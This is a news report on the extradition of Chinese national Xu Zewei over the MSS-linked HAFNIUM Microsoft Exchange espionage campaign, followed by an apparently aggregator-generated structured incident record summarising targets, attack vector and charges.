Chinese National Extradited to U.S. in Major Cyber Espionage Case Linked to MSS
A Chinese national, Xu Zewei, was extradited from Italy to the United States to face charges for his alleged role in a large-scale cyber espionage campaign orchestrated by China’s Ministry of State Security (MSS). Xu, alongside co-conspirator Zhang Yu who remains at large is accused of breaching thousands of computers worldwide while employed by Shanghai Powerock Network Co. Ltd., a firm prosecutors describe as a front for state-sponsored hacking operations.
The campaign targeted U.S. universities, COVID-19 research organizations, and law firms, with attackers seeking sensitive data on vaccines, treatments, and testing. Prosecutors also link Xu to the HAFNIUM operation, which exploited vulnerabilities in Microsoft Exchange Server in 2021 to compromise email systems and infiltrate victim networks. The attacks, disclosed by Microsoft in March 2021, prompted emergency security updates from U.S. agencies, including the FBI and CISA, after affecting over 12,700 U.S. organizations.
According to court documents, Xu and his associates installed web shells on exploited servers, enabling remote access and data exfiltration. Victims included a university in Texas and a global law firm with offices in Washington, D.C. The MSS, including its Shanghai State Security Bureau (SSSB), allegedly directed the hacking, leveraging a network of private contractors to obscure its involvement.
Xu faces charges of wire fraud, computer intrusion, and aggravated identity theft, with potential prison sentences ranging from two to 20 years per count. U.S. officials emphasized that China’s use of third-party contractors in cyber operations has led to indiscriminate targeting, leaving systems vulnerable to further exploitation and enabling the sale of stolen data to other malicious actors. The case underscores the MSS’s reliance on private entities to conduct state-backed cyber espionage while distancing itself from direct attribution.
Source: https://www.helpnetsecurity.com/2026/04/28/chinese-national-cyber-espionage-charges/
Microsoft Security cybersecurity rating report: https://www.rankiteo.com/company/microsoft-security
"id": "MIC1777386894",
"linkid": "microsoft-security",
"type": "Cyber Attack",
"date": "3/2021",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'industry': 'Education',
'location': 'Texas, USA',
'name': 'University in Texas',
'type': 'University'},
{'industry': 'Legal',
'location': 'Washington, D.C., USA',
'name': 'Global law firm with offices in Washington, '
'D.C.',
'type': 'Law Firm'},
{'industry': 'Healthcare/Research',
'location': 'USA',
'name': 'COVID-19 research organizations',
'type': 'Research Organization'}],
'attack_vector': 'Exploitation of Microsoft Exchange Server vulnerabilities '
'(HAFNIUM)',
'data_breach': {'data_exfiltration': 'Yes',
'personally_identifiable_information': 'Yes (aggravated '
'identity theft '
'charges)',
'sensitivity_of_data': 'High (sensitive research, legal, and '
'personal data)',
'type_of_data_compromised': ['COVID-19 research data',
'Legal information',
'Email communications']},
'date_detected': '2021-03',
'date_publicly_disclosed': '2021-03',
'description': 'A Chinese national, Xu Zewei, was extradited from Italy to '
'the United States to face charges for his alleged role in a '
'large-scale cyber espionage campaign orchestrated by China’s '
'Ministry of State Security (MSS). The campaign targeted U.S. '
'universities, COVID-19 research organizations, and law firms, '
'exploiting vulnerabilities in Microsoft Exchange Server to '
'compromise email systems and infiltrate victim networks.',
'impact': {'data_compromised': 'Sensitive data on vaccines, treatments, '
'testing, and legal information',
'identity_theft_risk': 'High (aggravated identity theft charges)',
'operational_impact': 'Compromised email systems, unauthorized '
'remote access',
'systems_affected': 'Email systems, victim networks'},
'initial_access_broker': {'backdoors_established': 'Web shells',
'entry_point': 'Microsoft Exchange Server '
'vulnerabilities',
'high_value_targets': ['Universities',
'Law firms',
'COVID-19 research '
'organizations']},
'investigation_status': 'Ongoing (Xu extradited, Zhang Yu at large)',
'motivation': 'State-sponsored espionage, theft of sensitive data (COVID-19 '
'research, legal information)',
'post_incident_analysis': {'root_causes': 'Exploitation of unpatched '
'Microsoft Exchange Server '
'vulnerabilities, state-sponsored '
'cyber espionage'},
'references': [{'source': 'U.S. Department of Justice'},
{'source': 'Microsoft Security Response Center'}],
'regulatory_compliance': {'legal_actions': 'Charges filed (wire fraud, '
'computer intrusion, aggravated '
'identity theft)'},
'response': {'containment_measures': 'Emergency security updates for '
'Microsoft Exchange Server',
'law_enforcement_notified': 'Yes (FBI, CISA)'},
'threat_actor': ['China’s Ministry of State Security (MSS)',
'Shanghai State Security Bureau (SSSB)',
'Shanghai Powerock Network Co. Ltd.'],
'title': 'Chinese National Extradited to U.S. in Major Cyber Espionage Case '
'Linked to MSS',
'type': 'Cyber Espionage',
'vulnerability_exploited': 'Microsoft Exchange Server vulnerabilities (e.g., '
'ProxyLogon)'}